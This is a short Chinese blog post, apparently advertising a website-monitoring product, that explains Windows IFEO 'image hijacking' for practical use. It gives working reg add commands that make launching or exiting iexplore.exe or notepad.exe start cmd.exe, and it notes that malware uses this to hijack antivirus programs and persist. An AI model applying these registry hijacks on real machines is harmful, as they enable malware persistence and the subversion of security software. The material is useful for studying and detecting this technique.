映像劫持，映像劫持在实战中的使用

栏目：IIS7网站监控 时间：2020-10-28 09:54

      映像劫持它又被称为“重定向劫持”（Redirection Hijack），它和“映像劫持”（Image Hijack，或IFEO Hijack）只是称呼不同，实际上都是一样的技术手段。白话来讲就是做某个操作的时候被拦截下来，干了别的事。

      IIS7网站监控可以做到：
      1、检测网站是否被劫持
      2、域名是否被墙
      3、DNS污染检测
      4、网站打开速度检测
      5、网站是否被黑、被入侵、被改标题、被挂黑链

      下载地址：IIS7网站监控



      劫持ie打开cmd

      1.在注册表

      HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options该注册表项建立一个子键，名字是你想劫持的程序，比如 iexplore.exe（不用设置路径，这样设置后你系统里所有的名为iexplore.exe的可执行文件都会被劫持）

      2. 给刚加的子键添加一个字符串值（应该称为该子键的属性），名字为Debugger，值为你想运行起来的程序，比如 cmd.exe(程序完整路径)

      3. 打开ie浏览器，这个时候会发现cmd启动了。

      有一些病毒利用系统的这一特性，让运行杀毒软件程序的操作变成了再次执行病毒体，而一些病毒会在系统不同目录存在多个副本，利用映像劫持劫持不同的程序，指向不同的副本路径，这也是一些病毒被杀死进程删除单个病毒体后又能重新复活的原因之一。

      也可以直接用命令：

      reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe" /v Debugger/t REG_SZ /d C:\WINDOWS\system32\cmd.exe

      劫持notepad在退出的时候打开cmd

      在CurrentVersion注册一个GlobalFlag

      在SilentProcessExit注册一个ReportingMode和一个MonitorProcess

      最后在退出notepad的时候我们发现cmd启动了（此处省略动图，自行脑补）。直接上命令

      reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe" /v GlobalFlag /t REG_DWORD /d 512

      reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe" /v ReportingMode /t REG_DWORD /d 1

      reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe" /v MonitorProcess /d "C:\Windows\System32\cmd.exe"